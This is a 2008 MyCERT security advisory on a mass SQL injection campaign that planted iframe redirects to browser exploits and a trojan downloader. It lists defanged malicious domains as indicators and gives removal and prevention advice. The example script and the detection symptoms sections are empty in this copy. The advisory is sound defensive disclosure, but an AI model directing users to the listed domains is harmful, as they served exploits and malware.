MA-129.052008: MyCERT Special Alert - Mass SQL Injections Attack Original Issue Date: 16th May 2008 1.0 Introduction MyCERT has been observing a large number of websites around the globe being targeted by a mass SQL injection attack. This attack causes the contents of the websites to be modified with codes that will redirect users to another server which contain contain malicious codes and exploits. The malcious codes or exploit will then allow the attacker to gain control of the victim's computer. 2.0 Technical Description The mass SQL injection attacks seem to be increasing in number and more domains are being injected and used to become a vector of the attack -. MyCERT believes that the attack exploits SQL injection vulnerabilities in web applications to inject malicious script to the page content. An example of the malicious script that is as follows: 
The redirection on the malicious domain is done using iframes. The index.htm, for example on one of the malicious site that we analyzed, contain 3 other iframes that redirect users to a Real Player exploit , Internet Explorer's VML bug exploit and a Visual Basic Script that forces the victim to download and install a trojan. Based on our assessment, we have only detected very few Malaysian sites that have been affected by this. pare affected by this mass SQL injection attack. However, MyCERT encourages administrators to be vigilant and alert of this attack or attempts of exploitation. Most of the servers hosting the malicious scripts and exploits are using the .CN domain and located in various countries. hxxp://www.wowgm1.cn
hxxp://www.killwow1.cn
hxxp://www.wowyeye.cn
hxxp:// vb008.cn
hxxp://9i5t.cn 9i5t.cn
hxxp://bbs.jueduizuan.com
hxxp://computershello.cn
hxxp://winzipices.cn
hxxp://www.11910.net
hxxp://www.414151.com
hxxp://www.aspder.com
hxxp://www.bluell.cn
hxxp://www.direct84.com
hxxp://www.kisswow.com.cn
hxxp://www.nihaorr1.com
hxxp://www.nmidahena.com
hxxp://www.ririwow.cn
hxxp://www.wowgm1.cn
hxxp://www.wowgm2.cn
hxxp://www.wowyeye.cn
hxxp://yl18.net MyCERT had communicated with the relevant parties to shutdown the above domains. 3.0 Detection Symtoms of compromise are as follows: 4.0 Removal The malicious script, i.e must be removed from the content of the website. However, merely removing the malicious script does not fix the vulnerability that had allowed SQL injection attack to be carried out in the first place. 5.0 Preventive Measure The following preventive measures can be applied by administrators: Web administrators may refer to MyCERT's “Guide on Fixing SQL injection vulnerabilities” to prevent this vulnerability from being exploited. System administrators and ISPs may consider filtering incoming and outgoing traffic to the above domains. Administrators are advised to patch or upgrade their web applications and relevant software to the latest version.
If your website has become a victim of this attack, please do not hesitate to report to us for our further assistance. MyCERT can be reached for assistance at: Tel: 03-89926969
Fax: 03-89453442
Email: mycert [at] mycert.org.my or cyber999 [at] cybersecurity.org.my
Web: http://www.mycert.org.my/report_incidents/online_form.html
Hp: 019-2665850
SMS: 019-2813801 References Feedback can be directed to MyCERT. Produced in 16 May 2008 by MyCERT, CyberSecurity Malaysia , an agency under the Ministry of Science, Technology and Innovation (MOSTI). Revision History:
Initial Release: 16 May 2008 |
